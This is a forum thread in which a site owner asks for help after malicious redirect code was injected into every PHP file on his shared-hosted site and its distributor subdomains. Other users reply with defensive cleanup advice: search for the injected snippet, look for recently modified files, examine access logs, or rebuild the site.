WEBSITE HIJACKED - Php code infected - HELP?

  • Context: PHP 
  • Thread starter Thread starter bigdawg723
  • Start date Start date
  • Tags Tags
    Code Php
Click For Summary
SUMMARY

The forum discussion centers on a severe website hijacking incident involving PHP code injection, where every PHP file, including those in subdomains, was compromised with a malicious redirect to a fake antivirus site. The user, Josh, suspects a vulnerability in his contact form that allows unauthorized access to his PHP files. Recommendations include searching for modified files, examining HTTP access logs, and identifying the source of the infection to prevent future attacks. The issue has been linked to vulnerabilities affecting multiple GoDaddy shared servers, despite Josh's WordPress installation being up-to-date.

PREREQUISITES
  • Understanding of PHP file structures and subdomain configurations
  • Knowledge of web server access logs and their analysis
  • Familiarity with common web vulnerabilities, particularly in PHP applications
  • Experience with file permissions and security practices in web hosting environments
NEXT STEPS
  • Investigate PHP file permissions and secure them against unauthorized modifications
  • Learn how to analyze HTTP access logs to trace potential attack vectors
  • Research common PHP vulnerabilities and how to mitigate them, focusing on input validation
  • Explore options for website security tools, such as Sucuri or Wordfence, to enhance protection
USEFUL FOR

Web developers, system administrators, and anyone managing PHP-based websites who are dealing with security vulnerabilities and seeking to prevent website hijacking incidents.

bigdawg723
Messages
13
Reaction score
0
WEBSITE HIJACKED - Php code infected! - HELP!?

Hey All,

I've got a major *$%#@ problem. I'm freaking out here.

Check this out.

On my website, I have a way to allow visitors... to become distributors and sell my product as well. When they become a distributor, it creates a subdomain for them and, basically, an exact copy of my website in that subdomain folder.

So... not only do I have my set of about 20 php pages and a solid 20+ php includes... I have to multiple those numbers by roughly... 50 distributors or more!

Here's my problem.

EVERY, not just a few... not just the pages (also includes, etc)... not just my root directory (also all subdomains)... EVERY PHP FILE has a new line of code at the very top that is a Script to a php file (oo.php) on another website that redirects every visitor to a new site and it's one of those 'fake antivirus' programs that are, essentially, a virus in their own.

When I first saw the redirect, I knew I was hijacked... but I assumed it was just 1 thing injected into my SQL Databases... or a simple code change or file somewhere... but it is THOUSANDS of files... and yes, I could go ahead and remove that snippet of code from each php file... but I still wouldn't know where it came from and I can only assume that the process which infected those pages still exists and would reinfect them all again the the very near future.

I'm begging you for help.

I know my contact form doesn't "close" the inputs or something... because it sends all contacts to the database table... and there's some major vulnerability there... but I couldn't find any entry in that database with any malicious code... perhaps it auto-deleted itself or something?

Please, I beg you, please lend a hand if you know anything about this.

Thank You,
Josh
 
Technology news on Phys.org


it creates a subdomain for them and, basically, an exact copy of my website in that subdomain folder.
What is "it"? Is "it" from a trusted source? I am by no means an expert with these things, but that was the first thing that got my attention.
 


First up, do a search on google for text snippits of the php line that was added. If someone else has been fighting this battle already, they'll be a good candidate to help solve the problem.

Otherwise, not enough information. Something on your site that has write access to your PHP files is either currently compromised, or is still vulnerable and was/is being attacked. What OS are you on? Do you have script access? Cron access? Who's your ISP? Has anything else been modified?

Step 1, look for non-PHP files that have been modified recently. Hopefully, you can use that to detect whether or not there's some binary file or otherwise that's sitting on your system that will re-infect you. That's dangerous. If you have some that look suspicious, quarantine them. Make them non-executable and non-readable-- change the file name, whatever. There's a distinct possibility if you've got other programs that have installed themselves, that they'll try to re-install themselves, so check any config files you have. Heck, compare them to backups with your ISP.

Step 2, look for PHP files that have changed that reference the evil site in question. That is, it's possibly just a single PHP file that has write access to other PHP files, and if that PHP file is executed again, you're re-infected.

Step 3, look at your HTTP access log. See what was happening around the time that you were infected, and examine whatever relevant files were accessed during that time. Chances are, the attack started with a web request, and that's one way of trying to narrow down the point of attack. Otherwise, if the infection started in some OTHER way, talk to your ISP.

DaveE
 


I searched for that PHP thread... found it!

http://blog.sucuri.net/2010/05/lots-of-sites-reinfected-now-using.html

Apparently this happened to "hundreds" of GoDaddy shared servers... I assume thousands!

I've never seen this before... I have a few words for GoDaddy... but they don't care, maybe time for a host switch? They said it was due to outdated versions of WOrdPress... mine was fully up-to-date at the time of the attack. BS

Thanks for the quick replies though!

I love this forum - more helpful than any PHP-only forum I've found thus far.
 


You have really 2 ways to go with this:

1) Delete everything and start from new
2) Figure out how and where the vulnerability occurred, fix it, and then go about fixing the database issue.Good luck.
 


Please tell me that you have shut down your site until you fix the problem.
 

Similar threads

PHP How can I decode multiple layers of encoded php code?
  • · Replies 9 ·
Replies
9
Views
3K
PHP Would like some help understanding website management
  • · Replies 12 ·
Replies
12
Views
2K
Do you want to build a website?
  • · Replies 15 ·
Replies
15
Views
3K
PHP Learning Web Programming: MySQL & PHP for Complex Websites
  • · Replies 16 ·
Replies
16
Views
2K
PHP Advice on how to set column widths in php
  • · Replies 7 ·
Replies
7
Views
7K
PHP Limiting Output from Unmaintainable PHP Code
  • · Replies 7 ·
Replies
7
Views
3K
PHP Using PHP and cURL to submit POST requests to a website
  • · Replies 7 ·
Replies
7
Views
6K
PHP Help with php and this part of the code ?
  • · Replies 1 ·
Replies
1
Views
3K
PHP Preventing SQL Injection in PHP Forms
  • · Replies 4 ·
Replies
4
Views
6K
PHP PHP - Wrong datatype for second argument
  • · Replies 2 ·
Replies
2
Views
5K